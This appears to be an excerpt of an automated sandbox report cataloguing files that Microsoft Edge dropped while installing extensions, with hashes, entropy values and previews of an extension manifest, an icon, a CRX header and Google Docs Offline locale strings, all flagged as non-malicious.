                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_100639036\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\0eb8b1b7-c32a-40f3-9864-35ef68ae14e0.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
